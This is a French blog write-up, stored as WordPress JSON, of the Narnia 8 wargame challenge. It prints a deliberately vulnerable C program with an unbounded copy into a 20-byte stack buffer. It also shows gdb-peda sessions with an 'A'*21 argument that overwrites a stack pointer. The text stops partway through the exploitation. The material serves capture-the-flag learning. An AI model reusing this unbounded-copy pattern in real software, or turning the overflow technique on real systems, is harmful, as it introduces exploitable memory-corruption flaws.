{"id":744,"date":"2023-09-01T14:50:40","date_gmt":"2023-09-01T12:50:40","guid":{"rendered":"https:\/\/mindshield.eu\/?p=744"},"modified":"2025-12-17T18:28:31","modified_gmt":"2025-12-17T17:28:31","slug":"narnia8","status":"publish","type":"post","link":"https:\/\/mindshield.eu\/index.php\/2023\/09\/01\/narnia8\/","title":{"rendered":"\ud83e\udd81Narnia 8"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Nous nous retrouvons pour ce dernier challenge de la s\u00e9rie Narnia.<\/p>

J’ai beaucoup appr\u00e9ci\u00e9 faire ces challenges, ils m’en ont appris beaucoup sur les Buffer Overflow, le fonctionnement d’une pile, l’assembleur etc.<\/p>

J’esp\u00e8re que c’est le cas pour vous aussi !<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t

\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t

D\u00e9couverte<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\n\t\t\t\t\t#include \r\n#include \r\n#include \r\n\/\/ gcc's variable reordering fucked things up\r\n\/\/ to keep the level in its old style i am\r\n\/\/ making \"i\" global until i find a fix\r\n\/\/ -morla\r\nint i;\r\n\r\nvoid func(char *b){\r\n        char *blah=b;\r\n        char bok[20];\r\n        \/\/int i=0;\r\n\r\n        memset(bok, '\\0', sizeof(bok));\r\n        for(i=0; blah[i] != '\\0'; i++)\r\n                bok[i]=blah[i];\r\n\r\n        printf(\"%s\\n\",bok);\r\n}\r\n\r\nint main(int argc, char **argv){\r\n\r\n        if(argc &gt; 1)\r\n                func(argv[1]);\r\n        else\r\n        printf(\"%s argument\\n\", argv[0]);\r\n\r\n        return 0;\r\n}<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5370423 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5370423\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-17d67ac\" data-id=\"17d67ac\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1183296 elementor-widget elementor-widget-text-editor\" data-id=\"1183296\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tCe script est compos\u00e9, dans un premier temps, d&#8217;une fonction <code>main<\/code>, qui ne prend qu&#8217;un seul argument.<br><br>\n\nCet argument est pass\u00e9 \u00e0 la fonction <code>func<\/code> et stock\u00e9 dans la variable <code>blah<\/code>. <br>\n<blockquote>Il est important de noter que la variable <code>blah<\/code> n&#8217;a pas de limite de taille, contrairement \u00e0 <code>bok<\/code>, qui ne peut recevoir que 20 caract\u00e8res.<\/blockquote>\n<code>bok<\/code> est ensuite enti\u00e8rement remis \u00e0 0 :\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bcc1fe7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bcc1fe7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-821ac33\" data-id=\"821ac33\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1b684ea elementor-widget elementor-widget-code-highlight\" data-id=\"1b684ea\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-javascript \">\n\t\t\t\t<code readonly=\"true\" class=\"language-javascript\">\n\t\t\t\t\t<xmp> memset(bok, '\\0', sizeof(bok));<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-eb26dba elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"eb26dba\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ffbba7b\" data-id=\"ffbba7b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-116dddb elementor-widget elementor-widget-text-editor\" data-id=\"116dddb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Ensuite, <code>blah<\/code> est copi\u00e9 <strong>compl\u00e8tement\u00a0<\/strong>dans le tableau <code>bok<\/code> :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9bbb469 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9bbb469\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4fee5c9\" data-id=\"4fee5c9\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7cbb396 elementor-widget elementor-widget-code-highlight\" data-id=\"7cbb396\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>for(i=0; blah[i] != '\\0'; i++)\r\n        bok[i]=blah[i];<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f31103e elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f31103e\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-16f15ff\" data-id=\"16f15ff\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-082e485 elementor-widget elementor-widget-text-editor\" data-id=\"082e485\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Vous avez maintenant l&#8217;habitude, cette pratique est tr\u00e8s dangereuse puisqu&#8217;elle permet d&#8217;\u00e9crire directement sur la pile et de provoquer un overflow.<\/p><p>Exemple dans peda :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-88aac55 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"88aac55\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-a3c7b24\" data-id=\"a3c7b24\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7f73a4c elementor-widget elementor-widget-code-highlight\" data-id=\"7f73a4c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>gdb-peda$ set args $(python2 -c 'print(\"A\"*21)')\n\ngdb-peda$ x\/16x $esp\n\n0xffffd4d4:     0x41414141      0x41414141      0x41414141      0x41414141\n0xffffd4e4:     0x41414141      0xffffd741      0xffffd4f8      0x08049211\n0xffffd4f4:     0xffffd719      0xf7ffd020      0xf7da2519      0x00000002\n0xffffd504:     0xffffd5b4      0xffffd5c0      0xffffd520      0xf7fab000\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7defac7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7defac7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-51a1596\" data-id=\"51a1596\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b55d6d elementor-widget elementor-widget-text-editor\" data-id=\"8b55d6d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tOn voit clairement une suite de &#8220;A&#8221; (<code>0x41414141<\/code>) suivi d&#8217;une adresse modifi\u00e9e : <code>0xffffd741<\/code>, ce qui prouve bien que le buffer overflow est possible.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1f40221 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1f40221\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-10ca2f3\" data-id=\"10ca2f3\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-54856e3 elementor-widget elementor-widget-heading\" data-id=\"54856e3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Exploitation<\/h2>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c770db2 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c770db2\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0c6aa93\" data-id=\"0c6aa93\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c349ace elementor-widget elementor-widget-text-editor\" data-id=\"c349ace\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Commen\u00e7ons par r\u00e9soudre ce challenge en utilisant <code>peda<\/code>. <br \/>Utilisons un argument afin d&#8217;overflow de 1 octet, pour l&#8217;instant :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-036890a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"036890a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f9a56d5\" data-id=\"f9a56d5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b43a973 elementor-widget elementor-widget-code-highlight\" data-id=\"b43a973\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>set args $(python2 -c 'print(\"A\"*21)')<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cad206b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cad206b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1aa0bac\" data-id=\"1aa0bac\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c456b8a elementor-widget elementor-widget-text-editor\" data-id=\"c456b8a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tPlacer un breakpoint au niveau de l&#8217;instruction <code>test al, al<\/code>.<br><br>\n\nIl s&#8217;agit de la comparaison entre <code>bok<\/code> et <code>\\0<\/code> au sein de la boucle for du programme C (<code>for(i=0; <strong>blah[i] != '\\0'<\/strong>; i++)<\/code>).<br> <br>\n\nC&#8217;est \u00e0 cet endroit que l&#8217;on saura si le buffer overflow a fonctionn\u00e9 :\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1690a07 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"1690a07\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c5a0380\" data-id=\"c5a0380\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1b1ffa3 elementor-widget elementor-widget-code-highlight\" data-id=\"1b1ffa3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>b *func+92<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-09c49a7 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"09c49a7\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-eeb6ad7\" data-id=\"eeb6ad7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7804199 elementor-widget elementor-widget-text-editor\" data-id=\"7804199\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Passez ensuite les instructions avec la commande &#8216;c&#8217;. On peut voir le buffer qui se remplit petit \u00e0 petit.<\/p><p>Voici \u00e0 quoi ressemble peda lorsque nous atteignons les 20 &#8220;A&#8221; :<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d99d390 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d99d390\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9a9a743\" data-id=\"9a9a743\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ce4b1c4 elementor-widget elementor-widget-code-highlight\" data-id=\"ce4b1c4\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>[----------------------------------registers-----------------------------------]\r\nEAX: 0x41 ('A')\r\nEBX: 0xf7fab000 -&gt; 0x229dac\r\nECX: 0x14\r\nEDX: 0x14\r\nESI: 0xffffd5b4 --&gt; 0xffffd708 (\"\/narnia\/narnia8\")\r\nEDI: 0xf7ffcb80 --&gt; 0x0\r\nEBP: 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\nESP: 0xffffd4d4 ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\nEIP: 0x80491e2 (:      test   al,al)\r\nEFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80491da : mov    eax,DWORD PTR [ebp-0x4]\r\n   0x80491dd : add    eax,edx\r\n   0x80491df : movzx  eax,BYTE PTR [eax]\r\n=&gt; 0x80491e2 : test   al,al\r\n   0x80491e4 : jne    0x80491ae \r\n   0x80491e6 : lea    eax,[ebp-0x18]\r\n   0x80491e9 : push   eax\r\n   0x80491ea :        push   0x804a008\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd4d4 ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0004| 0xffffd4d8 ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0008| 0xffffd4dc ('A' , \"\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0012| 0xffffd4e0 (\"AAAAAAAA\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0016| 0xffffd4e4 (\"AAAA\\030\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0020| 0xffffd4e8 --&gt; 0xffffd718 ('A' )\r\n0024| 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt;; 0xf7ffda40 --&gt; 0x0\r\n0028| 0xffffd4f0 --&gt; 0x8049211 (<main>:      add    esp,0x4)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080491e2 in func ()\r\ngdb-peda$\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5e2f7bf elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"5e2f7bf\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d7a2283\" data-id=\"d7a2283\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2e10b3e elementor-widget elementor-widget-text-editor\" data-id=\"2e10b3e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\tOn voit qu&#8217;au niveau des adresses <code>0xffffd4d4<\/code> jusqu&#8217;\u00e0 <code>0xffffd4e4<\/code>, la pile a \u00e9t\u00e9 remplie de A. <br><br>\n\nEnsuite, \u00e0 l&#8217;adresse <code>0xffffd4e8<\/code>, nous avons notre pointeur vers notre argument.<br><br>\n\n<blockquote>Que se passe-t-il lorsque nous ajoutons un A suppl\u00e9mentaire ?<\/blockquote>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-6492a66 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"6492a66\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-43fd3a7\" data-id=\"43fd3a7\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0ee8655 elementor-widget elementor-widget-code-highlight\" data-id=\"0ee8655\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c \">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>[----------------------------------registers-----------------------------------]\r\nEAX: 0x69 ('i')\r\nEBX: 0xf7fab000 --&gt; 0x229dac\r\nECX: 0x14\r\nEDX: 0x15\r\nESI: 0xffffd5b4 --&gt; 0xffffd708 (\"\/narnia\/narnia8\")\r\nEDI: 0xf7ffcb80 --&gt; 0x0\r\nEBP: 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\nESP: 0xffffd4d4 ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\nEIP: 0x80491e2 (:      test   al,al)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x80491da : mov    eax,DWORD PTR [ebp-0x4]\r\n   0x80491dd : add    eax,edx\r\n   0x80491df : movzx  eax,BYTE PTR [eax]\r\n=&gt; 0x80491e2 : test   al,al\r\n   0x80491e4 : jne    0x80491ae \r\n   0x80491e6 : lea    eax,[ebp-0x18]\r\n   0x80491e9 : push   eax\r\n   0x80491ea :        push   0x804a008\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xffffd4d4 ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0004| 0xffffd4d8 ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0008| 0xffffd4dc ('A' , \"\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0012| 0xffffd4e0 (\"AAAAAAAAA\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0016| 0xffffd4e4 (\"AAAAA\\327\\377\\377\\370\\324\\377\\377\\021\\222\\004\\b\\030\\327\\377\\377 \\320\\377\\367\\031%\\332\\367\\002\")\r\n0020| 0xffffd4e8 --&gt; 0xffffd741 (\"=\/narnia\")\r\n0024| 0xffffd4ec --&gt; 0xffffd4f8 --&gt; 0xf7ffd020 --&gt; 0xf7ffda40 --&gt; 0x0\r\n0028| 0xffffd4f0 --&gt; 0x8049211 (<main>:      add    esp,0x4)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 1, 0x080491e2 in func ()\r\ngdb-peda$\r\n<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3443674 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3443674\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container 